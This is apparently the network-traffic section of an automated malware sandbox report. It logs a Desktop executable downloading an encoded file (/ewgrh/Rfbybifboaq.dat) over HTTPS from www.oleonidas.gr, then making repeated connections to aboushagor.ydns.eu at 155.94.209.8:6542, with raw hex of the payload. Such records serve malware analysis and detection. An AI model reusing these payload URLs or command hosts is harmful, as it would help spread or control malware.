                                                                                Nov 20, 2024 10:31:28.029211998 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.029233932 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.029243946 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.029273033 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.029290915 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.068320036 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.068411112 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.069025040 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.069092035 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.069858074 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.069915056 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.070543051 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.070607901 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.071371078 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.071429968 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.072079897 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.072141886 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.073062897 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.073120117 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.074069977 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.074124098 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.074840069 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.074898005 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.075721979 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.075781107 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.108232021 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.108333111 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.109096050 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.109162092 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.109920979 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.109987020 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.110858917 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.110930920 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.111737967 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.111814022 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.112464905 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.112529039 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.113255978 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.113317966 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.153031111 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.153106928 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.153378010 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.153445005 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.154526949 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.154593945 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.155191898 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.155257940 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.156065941 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.156124115 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.156955004 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.157021046 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.157867908 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.157919884 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.157931089 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.157959938 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.157969952 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.158001900 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.158039093 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.158813000 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.158878088 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.195035934 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.195127964 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.195871115 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.195944071 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.196515083 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.196588993 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.197067976 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.197133064 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.197679043 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.197743893 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.198333025 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.198398113 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.199238062 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.199302912 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.244519949 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.244612932 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.245213985 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.245287895 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.245398998 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.245457888 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.255183935 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.255238056 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.255254030 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.255268097 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.255291939 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.255295992 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.255322933 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.255330086 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.255352974 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.255356073 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.255384922 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.255389929 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.255408049 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.255414009 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.255458117 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.255458117 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.255472898 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.255506039 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.286180973 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.286242962 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.286292076 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.286314011 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.286329031 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.286356926 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.286403894 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.286706924 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.286750078 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.286782026 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.286788940 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.286808968 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.286828041 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.286937952 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.287003040 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.288723946 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.288800955 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.328886032 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.329020023 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.329543114 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.329618931 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.330646038 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.330712080 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.331072092 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.331135988 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.331599951 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.331657887 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.331712008 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.331770897 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.333642960 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.333719015 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.334506989 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.334578037 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.335378885 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.335444927 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.336236954 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.336313963 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.368838072 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.368947983 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.369647026 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.369735003 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.370157003 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.370240927 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.370985031 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.371056080 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.372452021 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.372514009 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.372530937 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.372566938 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.372600079 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.372620106 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.373223066 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.373316050 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.413790941 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.413944006 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.414252996 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.414325953 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.415013075 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.415091991 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.415520906 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.415601969 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.416281939 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.416352034 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.417048931 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.417119026 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.417876959 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.417944908 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.418798923 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.418874025 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.419655085 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.419724941 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.455734015 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.455902100 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.456254959 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.456336021 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.456382036 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.456425905 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:28.456459999 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.456490040 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:28.461875916 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:31.788114071 CET497116542192.168.2.6155.94.209.8
                                                                                Nov 20, 2024 10:31:31.793555975 CET654249711155.94.209.8192.168.2.6
                                                                                Nov 20, 2024 10:31:31.794131994 CET497116542192.168.2.6155.94.209.8
                                                                                Nov 20, 2024 10:31:31.797321081 CET497116542192.168.2.6155.94.209.8
                                                                                Nov 20, 2024 10:31:31.802217007 CET654249711155.94.209.8192.168.2.6
                                                                                Nov 20, 2024 10:31:53.231266022 CET654249711155.94.209.8192.168.2.6
                                                                                Nov 20, 2024 10:31:53.231359959 CET497116542192.168.2.6155.94.209.8
                                                                                Nov 20, 2024 10:31:53.246133089 CET497116542192.168.2.6155.94.209.8
                                                                                Nov 20, 2024 10:31:53.252672911 CET654249711155.94.209.8192.168.2.6
                                                                                Nov 20, 2024 10:31:56.676539898 CET498596542192.168.2.6155.94.209.8
                                                                                Nov 20, 2024 10:31:56.682454109 CET654249859155.94.209.8192.168.2.6
                                                                                Nov 20, 2024 10:31:56.682552099 CET498596542192.168.2.6155.94.209.8
                                                                                Nov 20, 2024 10:31:56.682836056 CET498596542192.168.2.6155.94.209.8
                                                                                Nov 20, 2024 10:31:56.687876940 CET654249859155.94.209.8192.168.2.6
                                                                                Nov 20, 2024 10:32:18.062235117 CET654249859155.94.209.8192.168.2.6
                                                                                Nov 20, 2024 10:32:18.062418938 CET498596542192.168.2.6155.94.209.8
                                                                                Nov 20, 2024 10:32:18.062807083 CET498596542192.168.2.6155.94.209.8
                                                                                Nov 20, 2024 10:32:18.068101883 CET654249859155.94.209.8192.168.2.6
                                                                                Nov 20, 2024 10:32:21.364203930 CET499866542192.168.2.6155.94.209.8
                                                                                Nov 20, 2024 10:32:21.369240999 CET654249986155.94.209.8192.168.2.6
                                                                                Nov 20, 2024 10:32:21.369328976 CET499866542192.168.2.6155.94.209.8
                                                                                Nov 20, 2024 10:32:21.369652033 CET499866542192.168.2.6155.94.209.8
                                                                                Nov 20, 2024 10:32:21.374510050 CET654249986155.94.209.8192.168.2.6
                                                                                Nov 20, 2024 10:32:42.759165049 CET654249986155.94.209.8192.168.2.6
                                                                                Nov 20, 2024 10:32:42.761979103 CET499866542192.168.2.6155.94.209.8
                                                                                Nov 20, 2024 10:32:42.762640953 CET499866542192.168.2.6155.94.209.8
                                                                                Nov 20, 2024 10:32:42.802975893 CET654249986155.94.209.8192.168.2.6
                                                                                Nov 20, 2024 10:32:46.255472898 CET499886542192.168.2.6155.94.209.8
                                                                                Nov 20, 2024 10:32:46.263473988 CET654249988155.94.209.8192.168.2.6
                                                                                Nov 20, 2024 10:32:46.263717890 CET499886542192.168.2.6155.94.209.8
                                                                                Nov 20, 2024 10:32:46.264327049 CET499886542192.168.2.6155.94.209.8
                                                                                Nov 20, 2024 10:32:46.273040056 CET654249988155.94.209.8192.168.2.6
                                                                                Nov 20, 2024 10:33:07.638422012 CET654249988155.94.209.8192.168.2.6
                                                                                Nov 20, 2024 10:33:07.638614893 CET499886542192.168.2.6155.94.209.8
                                                                                Nov 20, 2024 10:33:07.639072895 CET499886542192.168.2.6155.94.209.8
                                                                                Nov 20, 2024 10:33:07.643906116 CET654249988155.94.209.8192.168.2.6
                                                                                Nov 20, 2024 10:33:10.989721060 CET499906542192.168.2.6155.94.209.8
                                                                                Nov 20, 2024 10:33:10.997219086 CET654249990155.94.209.8192.168.2.6
                                                                                Nov 20, 2024 10:33:10.998131037 CET499906542192.168.2.6155.94.209.8
                                                                                Nov 20, 2024 10:33:10.998460054 CET499906542192.168.2.6155.94.209.8
                                                                                Nov 20, 2024 10:33:11.005938053 CET654249990155.94.209.8192.168.2.6
                                                                                Nov 20, 2024 10:33:32.356261015 CET654249990155.94.209.8192.168.2.6
                                                                                Nov 20, 2024 10:33:32.356353998 CET499906542192.168.2.6155.94.209.8
                                                                                Nov 20, 2024 10:33:32.603912115 CET499906542192.168.2.6155.94.209.8
                                                                                Nov 20, 2024 10:33:32.613689899 CET654249990155.94.209.8192.168.2.6

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Nov 20, 2024 10:31:25.128323078 CET5850453192.168.2.61.1.1.1
                                                                                Nov 20, 2024 10:31:25.410286903 CET53585041.1.1.1192.168.2.6
                                                                                Nov 20, 2024 10:31:31.764641047 CET6393053192.168.2.61.1.1.1
                                                                                Nov 20, 2024 10:31:31.780627012 CET53639301.1.1.1192.168.2.6

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Nov 20, 2024 10:31:25.128323078 CET192.168.2.61.1.1.10x3e51Standard query (0)www.oleonidas.grA (IP address)IN (0x0001)false
                                                                                Nov 20, 2024 10:31:31.764641047 CET192.168.2.61.1.1.10xc526Standard query (0)aboushagor.ydns.euA (IP address)IN (0x0001)false

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Nov 20, 2024 10:31:25.410286903 CET1.1.1.1192.168.2.60x3e51No error (0)www.oleonidas.groleonidas.grCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 20, 2024 10:31:25.410286903 CET1.1.1.1192.168.2.60x3e51No error (0)oleonidas.gr185.78.221.73A (IP address)IN (0x0001)false
                                                                                Nov 20, 2024 10:31:31.780627012 CET1.1.1.1192.168.2.60xc526No error (0)aboushagor.ydns.eu155.94.209.8A (IP address)IN (0x0001)false

                                                                                HTTP Request Dependency Graph

                                                                                • www.oleonidas.gr

                                                                                HTTPS Proxied Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.649709185.78.221.734431812C:\Users\user\Desktop\________.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-11-20 09:31:26 UTC87OUTGET /ewgrh/Rfbybifboaq.dat HTTP/1.1
                                                                                Host: www.oleonidas.gr
                                                                                Connection: Keep-Alive
                                                                                2024-11-20 09:31:26 UTC274INHTTP/1.1 200 OK
                                                                                Date: Wed, 20 Nov 2024 09:31:26 GMT
                                                                                Server: Apache
                                                                                Last-Modified: Tue, 19 Nov 2024 00:46:24 GMT
                                                                                Accept-Ranges: bytes
                                                                                Content-Length: 2118144
                                                                                Cache-Control: max-age=1209600
                                                                                Expires: Wed, 04 Dec 2024 09:31:26 GMT
                                                                                Vary: User-Agent
                                                                                Connection: close
                                                                                2024-11-20 09:31:26 UTC7918INData Raw: 7e 63 a1 33 3a 31 33 39 35 33 39 31 cc c6 31 33 81 31 33 39 31 33 39 31 73 39 31 33 39 31 33 39 31 33 39 31 33 39 31 33 39 31 33 39 31 33 39 31 33 39 31 33 39 31 33 39 31 33 39 31 b3 39 31 33 37 2e 89 37 31 87 30 fc 12 81 30 7f f4 10 67 51 58 40 19 41 41 56 56 41 58 5c 13 5a 50 5d 57 5e 47 19 53 56 19 43 46 57 11 5a 57 11 77 76 62 13 54 5e 57 5c 1f 3e 34 3b 17 39 31 33 39 31 33 39 61 76 39 31 7f 38 32 33 e8 ea ab 98 31 33 39 31 33 39 31 33 d9 31 3d 18 3a 32 09 31 33 73 11 33 39 37 33 39 31 33 39 31 3d 51 11 33 39 11 33 39 31 b3 19 31 33 39 71 33 39 11 33 39 31 31 39 31 37 39 31 33 39 31 33 39 35 33 39 31 33 39 31 33 39 f1 13 39 31 31 39 31 33 39 31 33 3a 31 73 bc 31 33 29 31 33 29 31 33 39 31 23 39 31 23 39 31 33 39 31 33 36 31 33 39 31 33 39 31 33 39 31
                                                                                Data Ascii: ~c3:1395391131391391s913913913913913913913913913913913919137.7100gQX@AAVVAX\ZP]W^GSVCFWZWwvbT^W\>4;9139139av91823139139131=:213s397391391=Q39391139q3939119179139139539139139911913913:1s13)13)1391#91#91391361391391391
                                                                                2024-11-20 09:31:26 UTC8000INData Raw: 39 31 1d 39 31 33 01 1b 33 39 31 4d ac 33 33 3d 19 64 3e 31 35 19 31 33 39 31 4d 7d 33 33 3d 4a 71 3b 31 37 03 fd cc c6 ce 15 19 31 33 39 31 0b f8 ce cc c6 1b 4d af 33 33 3d 19 68 3e 31 35 19 33 33 39 31 4d 7d 33 33 3d 4a 4c 3b 31 37 00 93 cc c6 ce 15 19 33 33 39 31 0b ae ce cc c6 23 33 39 26 19 39 31 33 2b 31 33 2d 1b 33 39 31 21 39 31 24 13 31 33 39 22 03 3a 31 37 39 31 33 39 31 33 39 31 33 39 1b 21 39 31 27 13 31 33 39 22 03 3a 31 37 39 31 33 39 31 33 39 31 33 39 1b 21 39 31 24 13 31 33 39 22 03 3a 31 37 39 31 33 39 31 33 39 31 33 39 1b 11 39 25 96 7e 31 33 3b 1b 33 39 31 20 09 32 33 3d 31 33 39 31 33 39 31 33 39 31 19 2b 31 33 2d 1b 33 39 31 20 09 32 33 3d 31 33 39 31 33 39 31 33 39 31 19 2b 31 33 2d 1b 33 39 31 20 09 32 33 3d 31 33 39 31 33 39 31 33
                                                                                Data Ascii: 91913391M33=d>151391M}33=Jq;171391M33=h>153391M}33=JL;173391#39&913+13-391!91$139":179139139139!91'139":179139139139!91$139":1791391391399%~13;391 23=1391391391+13-391 23=1391391391+13-391 23=13913913
                                                                                2024-11-20 09:31:26 UTC8000INData Raw: 33 39 31 33 39 1b 20 09 32 33 b9 31 33 39 30 33 39 20 1b 9a 33 33 3f 11 32 39 31 33 c7 3f 33 39 09 33 39 31 33 c7 3d 33 39 74 30 39 31 33 16 31 33 39 34 33 39 31 1d 39 31 33 01 1b 33 39 31 4d ac 33 33 3d 19 64 3e 31 35 19 31 33 39 31 4d 7d 33 33 3d 4a 0e 3b 31 37 00 fd cc c6 ce 15 19 31 33 39 31 0b f8 ce cc c6 1b 4d af 33 33 3d 19 68 3e 31 35 19 31 33 39 31 4d 7d 33 33 3d 4a b6 3b 31 37 03 93 cc c6 ce 15 19 33 33 39 31 0b ae ce cc c6 23 33 39 26 19 39 31 33 2b 31 33 2d 1b 33 39 31 30 09 39 33 3d 31 33 39 31 33 39 31 33 39 31 19 78 2d 33 39 31 33 39 31 7b 39 31 33 44 30 33 39 f4 32 39 31 0b 39 31 33 2e 31 33 38 22 03 3a 31 b3 39 31 33 38 31 33 28 19 90 3b 31 35 19 33 33 39 31 cd 37 31 33 01 31 33 39 31 cd 35 31 33 7c 32 33 39 31 36 39 31 33 16 31 33 39 37
                                                                                Data Ascii: 39139 23139039 33?2913?393913=39t09131394391913391M33=d>151391M}33=J;171391M33=h>151391M}33=J;173391#39&913+13-391093=1391391391x-391391{913D039291913.138":1913813(;1533917131391513|239169131397
                                                                                2024-11-20 09:31:26 UTC8000INData Raw: 2e 23 5d e3 af 31 20 39 20 69 22 29 11 33 39 31 cc 66 2e 2b 5d e3 af 28 39 24 61 22 3b 28 39 34 06 fe cf c6 ce 3b b9 42 32 39 35 19 39 31 28 09 32 33 53 31 33 39 7a 33 39 20 27 33 19 a3 3b 31 35 00 3a 33 39 31 40 50 31 33 33 3b 0b 68 31 33 39 31 40 53 31 33 33 3b ee 7c 31 33 39 17 41 7c 31 33 49 43 d7 39 31 43 11 5a 33 39 3b 5c 55 31 33 33 45 43 39 31 32 33 ec 13 39 31 33 1f 43 63 38 31 43 4b d5 33 39 41 1b 52 31 33 33 5e 5f 39 31 39 4d 41 33 39 30 39 e4 31 33 39 31 ee 39 31 33 39 37 19 39 31 32 25 31 33 39 31 17 39 2e 70 39 11 24 39 31 32 39 31 2b 39 3a 10 39 74 24 39 31 32 22 01 31 39 1f 33 39 31 33 39 31 33 4a 0d 33 39 3b 15 e4 3d 33 39 31 15 2e b1 45 38 31 37 e4 27 33 39 31 33 11 5c 33 39 3b b3 4f 30 33 3d ec 35 39 31 33 1f ec 33 39 31 33 13 31 33 38
                                                                                Data Ascii: .#]1 9 i")391f.+](9$a";(94;B29591(23S139z39 '3;15:391@P133;h1391@S133;|139A|13IC91CZ39;\U133EC9123913Cc81CK39AR133^_919MA3909139191397912%13919.p9$91291+9:9t$912"193913913J39;=391.E817'3913\39;O03=59133913138
                                                                                2024-11-20 09:31:26 UTC8000INData Raw: 39 31 13 65 31 33 39 68 af 19 70 33 39 31 13 3c 31 33 39 69 cd 37 18 33 c7 3d 34 39 11 3f 39 31 33 c7 3d 1a 39 ad cd 35 36 33 19 3d 33 39 31 13 96 31 33 39 11 09 39 31 33 60 ad 13 42 31 33 39 11 12 39 31 33 60 cf 3d 21 31 cd 35 36 33 19 3d 33 39 31 cd 35 29 33 a5 11 10 39 31 33 19 6f 33 39 31 6b c7 3f 1a 39 cf 3f 3e 31 13 34 31 33 39 cf 3f 10 31 af c7 3d 34 39 11 3e 39 31 33 19 01 33 39 31 13 37 31 33 39 69 af 19 78 33 39 31 13 2c 31 33 39 69 cd 37 29 33 c7 3d 34 39 11 3e 39 31 33 c7 3d 2b 39 ad cd 35 36 33 19 3c 33 39 31 13 7d 31 33 39 11 38 39 31 33 61 ad 13 0b 31 33 39 11 69 39 31 33 61 cf 3d 10 31 cd 35 36 33 19 3c 33 39 31 cd 35 18 33 a5 cf 3f 3e 31 13 37 31 33 39 11 c8 39 31 33 19 62 33 39 31 6a a5 11 3c 39 31 33 19 7b 33 39 31 6b c7 3f 1a 39 cf 3f
                                                                                Data Ascii: 91e139hp391<139i73=49?913=9563=391139913`B139913`=!1563=3915)3913o391k?9?>14139?1=49>9133917139ix391,139i7)3=49>913=+9563<391}1398913a139i913a=1563<39153?>17139913b391j<913{391k?9?
